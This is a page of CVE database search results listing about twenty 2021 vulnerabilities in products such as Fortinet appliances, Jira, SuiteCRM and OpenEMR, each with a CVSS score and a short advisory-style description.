Export limit exceeded: 80551 CVEs match your query. Please refine your search to export 10,000 CVEs or fewer.
Search
Search Results (80551 CVEs found)
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2021-26106 | 1 Fortinet | 3 Fortiap, Fortiap-s, Fortiap-w2 | 2024-11-21 | 7.8 High |
| An improper neutralization of special elements used in an OS Command vulnerability in FortiAP's console 6.4.1 through 6.4.5 and 6.2.4 through 6.2.5 may allow an authenticated attacker to execute unauthorized commands by running the kdbg CLI command with specifically crafted arguments. | ||||
| CVE-2021-26104 | 1 Fortinet | 3 Fortianalyzer, Fortimanager, Fortiportal | 2024-11-21 | 7.8 High |
| Multiple OS command injection (CWE-78) vulnerabilities in the command line interface of FortiManager 6.2.7 and below, 6.4.5 and below and all versions of 6.2.x, 6.0.x and 5.6.x, FortiAnalyzer 6.2.7 and below, 6.4.5 and below and all versions of 6.2.x, 6.0.x and 5.6.x, and FortiPortal 5.2.5 and below, 5.3.5 and below and 6.0.4 and below may allow a local authenticated and unprivileged user to execute arbitrary shell commands as root via specifically crafted CLI command parameters. | ||||
| CVE-2021-26097 | 1 Fortinet | 1 Fortisandbox | 2024-11-21 | 8.8 High |
| An improper neutralization of special elements used in an OS Command vulnerability in FortiSandbox 3.2.0 through 3.2.2, 3.1.0 through 3.1.4, and 3.0.0 through 3.0.6 may allow an authenticated attacker with access to the web GUI to execute unauthorized code or commands via specifically crafted HTTP requests. | ||||
| CVE-2021-26095 | 1 Fortinet | 1 Fortimail | 2024-11-21 | 7.5 High |
| The combination of various cryptographic issues in the session management of FortiMail 6.4.0 through 6.4.4 and 6.2.0 through 6.2.6, including the encryption construction of the session cookie, may allow a remote attacker already in possession of a cookie to possibly reveal and alter or forge its content, thereby escalating privileges. | ||||
| CVE-2021-26088 | 1 Fortinet | 1 Fortinet Single Sign-on | 2024-11-21 | 7.1 High |
| An improper authentication vulnerability in FSSO Collector version 5.0.295 and below may allow an unauthenticated user to bypass a FSSO firewall policy and access the protected network via sending specifically crafted UDP login notification packets. | ||||
| CVE-2021-26070 | 1 Atlassian | 3 Data Center, Jira, Jira Server | 2024-11-21 | 7.2 High |
| Affected versions of Atlassian Jira Server and Data Center allow remote attackers to evade behind-the-firewall protection of app-linked resources via a Broken Authentication vulnerability in the `makeRequest` gadget resource. The affected versions are before version 8.13.3, and from version 8.14.0 before 8.14.1. | ||||
| CVE-2021-26068 | 1 Atlassian | 1 Jira Server For Slack | 2024-11-21 | 8.8 High |
| An endpoint in Atlassian Jira Server for Slack plugin from version 0.0.3 before version 2.0.15 allows remote attackers to execute arbitrary code via a template injection vulnerability. | ||||
| CVE-2021-26026 | 1 Acdsee | 1 Photo Studio 2021 | 2024-11-21 | 7.8 High |
| PlugIns\IDE_ACDStd.apl in ACDSee Professional 2021 14.0 1721 has a User Mode Write Access Violation starting at IDE_ACDStd!JPEGTransW+0x000000000000c7f4 via a crafted BMP image. | ||||
| CVE-2021-26025 | 1 Acdsee | 1 Photo Studio 2021 | 2024-11-21 | 7.8 High |
| PlugIns\IDE_ACDStd.apl in ACDSee Professional 2021 14.0 1721 has a User Mode Write Access Violation starting at IDE_ACDStd!zlibVersion+0x0000000000004e5e via a crafted BMP image. | ||||
| CVE-2021-25994 | 1 Userfrosting | 1 Userfrosting | 2024-11-21 | 8.8 High |
| In Userfrosting, versions v0.3.1 to v4.6.2 are vulnerable to Host Header Injection. By luring a victim application user to click on a link, an unauthenticated attacker can use the “forgot password” functionality to reset the victim’s password and successfully take over their account. | ||||
| CVE-2021-25962 | 1 Shuup | 1 Shuup | 2024-11-21 | 8 High |
| “Shuup” application in versions 0.4.2 to 2.10.8 is affected by the “Formula Injection” vulnerability. A customer can inject payloads in the name input field in the billing address while buying a product. When a store administrator accesses the reports page to export the data as an Excel file and opens it, the payload gets executed. | ||||
| CVE-2021-25961 | 1 Salesagility | 1 Suitecrm | 2024-11-21 | 8 High |
| In “SuiteCRM” application, v7.1.7 through v7.10.31 and v7.11-beta through v7.11.20 fail to properly invalidate password reset links that is associated with a deleted user id, which makes it possible for account takeover of any newly created user with the same user id. | ||||
| CVE-2021-25960 | 1 Salesagility | 1 Suitecrm | 2024-11-21 | 8 High |
| In “SuiteCRM” application, v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by “CSV Injection” vulnerability (Formula Injection). A low privileged attacker can use accounts module to inject payloads in the input fields. When an administrator access accounts module to export the data as a CSV file and opens it, the payload gets executed. This was not fixed properly as part of CVE-2020-15301, allowing the attacker to bypass the security measure. | ||||
| CVE-2021-25957 | 1 Dolibarr | 1 Dolibarr | 2024-11-21 | 8.8 High |
| In “Dolibarr” application, v2.8.1 to v13.0.2 are vulnerable to account takeover via password reset functionality. A low privileged attacker can reset the password of any user in the application using the password reset link the user received through email when requested for a forgotten password. | ||||
| CVE-2021-25951 | 1 Xml2dict Project | 1 Xml2dict | 2024-11-21 | 7.5 High |
| XXE vulnerability in 'XML2Dict' version 0.2.2 allows an attacker to cause a denial of service. | ||||
| CVE-2021-25924 | 1 Thoughtworks | 1 Gocd | 2024-11-21 | 8.8 High |
| In GoCD, versions 19.6.0 to 21.1.0 are vulnerable to Cross-Site Request Forgery due to missing CSRF protection at the `/go/api/config/backup` endpoint. An attacker can trick a victim to click on a malicious link which could change backup configurations or execute system commands in the post_backup_script field. | ||||
| CVE-2021-25923 | 1 Open-emr | 1 Openemr | 2024-11-21 | 8.1 High |
| In OpenEMR, versions 5.0.0 to 6.0.0.1 are vulnerable to weak password requirements as it does not enforce a maximum password length limit. If a malicious user is aware of the first 72 characters of the victim user’s password, he can leverage it to an account takeover. | ||||
| CVE-2021-25910 | 1 Zivautomation | 2 4cct-ea6-334126bf, 4cct-ea6-334126bf Firmware | 2024-11-21 | 8 High |
| Improper Authentication vulnerability in the cookie parameter of ZIV AUTOMATION 4CCT-EA6-334126BF allows a local attacker to perform modifications in several parameters of the affected device as an authenticated user. | ||||
| CVE-2021-25909 | 1 Zivautomation | 2 4cct-ea6-334126bf, 4cct-ea6-334126bf Firmware | 2024-11-21 | 8.6 High |
| ZIV Automation 4CCT-EA6-334126BF firmware version 3.23.80.27.36371, allows an unauthenticated, remote attacker to cause a denial of service condition on the device. An attacker could exploit this vulnerability by sending specific packets to the port 7919. | ||||
| CVE-2021-25908 | 1 Fil-ocl Project | 1 Fil-ocl | 2024-11-21 | 7.5 High |
| An issue was discovered in the fil-ocl crate through 2021-01-04 for Rust. From<EventList> can lead to a double free. | ||||